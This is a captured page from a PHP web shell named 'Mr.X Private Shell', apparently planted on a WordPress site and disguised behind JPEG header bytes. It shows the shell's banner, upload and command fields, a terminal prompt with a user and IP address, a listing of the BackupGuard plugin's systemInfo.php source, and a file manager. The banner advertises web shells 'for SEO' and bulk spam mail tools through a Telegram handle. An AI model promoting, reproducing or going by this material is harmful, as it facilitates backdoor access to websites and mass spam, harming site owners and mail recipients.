����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

bkunreyz@216.73.217.13: ~ $
<?php
require_once(SG_SCHEDULE_PATH.'SGSchedule.php');
$contentClassName = getBackupPageContentClassName('system_info');
?>
<div id="sg-backup-page-content-system_info" class="sg-backup-page-content <?php echo $contentClassName; ?>">
    <div class="row">
        <div class="col-md-12">
            <form class="form-horizontal" method="post" data-sgform="ajax" data-type="sgsettings">
                <fieldset>
                    <div><h1 class="sg-backup-page-title"><?php _backupGuardT('System information')?></h1></div>
                    <div class="form-group">
                        <label class="col-md-3 sg-control-label sg-user-info"><?php _backupGuardT('Disk free space'); ?></label>
                        <div class="col-md-3 text-left">
                            <label class="sg-control-label">
                                <?php echo convertToReadableSize(@disk_free_space(SG_APP_ROOT_DIRECTORY)); ?>
                            </label>
                        </div>
                    </div>
                    <div class="form-group sg-info-wrapper">
                        <label class="col-md-3 sg-control-label sg-user-info"><?php _backupGuardT('Memory limit'); ?></label>
                        <div class="col-md-3 text-left">
                            <label class="sg-control-label"><?php echo SGBoot::$memoryLimit; ?></label>
                        </div>
                    </div>
                    <div class="form-group sg-info-wrapper">
                        <label class="col-md-3 sg-control-label sg-user-info">
                            <?php _backupGuardT('Max execution time'); ?>
                        </label>
                        <div class="col-md-3 text-left">
                            <label class="sg-control-label"><?php echo SGBoot::$executionTimeLimit; ?></label>
                        </div>
                    </div>
                    <div class="form-group sg-info-wrapper">
                        <label class="col-md-3 sg-control-label sg-user-info">
                            <?php _backupGuardT('PHP version'); ?>
                        </label>
                        <div class="col-md-3 text-left">
                            <label class="sg-control-label"><?php echo PHP_VERSION; ?></label>
                        </div>
                    </div>
                    <div class="form-group sg-info-wrapper">
                        <label class="col-md-3 sg-control-label sg-user-info"><?php _backupGuardT('MySQL version'); ?></label>
                        <div class="col-md-3 text-left">
                            <label class="sg-control-label"><?php echo SG_MYSQL_VERSION; ?></label>
                        </div>
                    </div>
                    <div class="form-group sg-info-wrapper">
                        <label class="col-md-3 sg-control-label sg-user-info">
                            <?php _backupGuardT('Int size'); ?>
                        </label>
                        <div class="col-md-3 text-left">
                            <?php echo '<label class="sg-control-label">'.PHP_INT_SIZE.'</label>'; ?>
                            <?php
                                if (PHP_INT_SIZE < 8) {
                                    echo '<label class="sg-control-label backup-guard-label-warning">Notice that archive size cannot be bigger than 2GB. This limitaion is comming from system.</label>';
                                }
                            ?>
                        </div>
                    </div>
                    <div class="form-group sg-info-wrapper">
                        <div class="col-md-3 ">
                            <label class="sg-control-label sg-user-info"><?php _backupGuardT('Curl version'); ?></label>
                        </div>
                        <div class="col-md-8 text-left">
                            <?php
                                if (function_exists('curl_version') && function_exists('curl_exec')) {
                                    $cv = curl_version();
                                    echo '<label class="sg-control-label sg-blue-label">'.$cv['version'].' / SSL: '.$cv['ssl_version'].' / libz: '.$cv['libz_version'].'</label>';
                                }
                                else {
                                    echo '<label class="sg-control-label backup-guard-label-warning">Curl required for BackupGuard for better functioning.</label>';
                                }
                            ?>
                        </div>
                    </div>
                    <div class="form-group sg-info-wrapper">
                        <div class="col-md-3 ">
                            <label class="sg-control-label sg-user-info"><?php _backupGuardT('Is cron available'); ?></label>
                        </div>
                        <div class="col-md-3 text-left">
                            <?php
                                $isCronAvailable = SGSchedule::isCronAvailable(true);
                                if ($isCronAvailable) {
                                    echo '<label class="sg-control-label">Yes</label>';
                                }
                                else {
                                    //echo '<label class="sg-control-label backup-guard-label-warning">Please consider enabling WP Cron in order to be able to setup schedules.</label>';
                                    echo '<label class="sg-control-label backup-guard-label-warning">WP cron is disabled on your end. If you don\'t use a custom cron, please, enable the WP cron or else the scheduled (backup) won\'t be successfully implemented.</label>';

                                }
                            ?>
                        </div>
                    </div>
                </fieldset>
            </form>
        </div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
ajax Folder 0755
config Folder 0755
cron Folder 0755
css Folder 0755
fonts Folder 0755
img Folder 0755
include Folder 0755
js Folder 0755
templates Folder 0755
backups.php File 13.46 KB 0644
boot.php File 180 B 0644
cloud.php File 14.66 KB 0644
dashboardWidget.php File 3.16 KB 0644
pagesContent.php File 1.29 KB 0644
proFeatures.php File 6.25 KB 0644
restore_wordpress.php File 7.49 KB 0644
schedule.php File 14.54 KB 0644
security.php File 260 B 0644
services.php File 3.79 KB 0644
settings.php File 20.2 KB 0644
support.php File 314 B 0644
systemInfo.php File 5.9 KB 0644
videoTutorials.php File 638 B 0644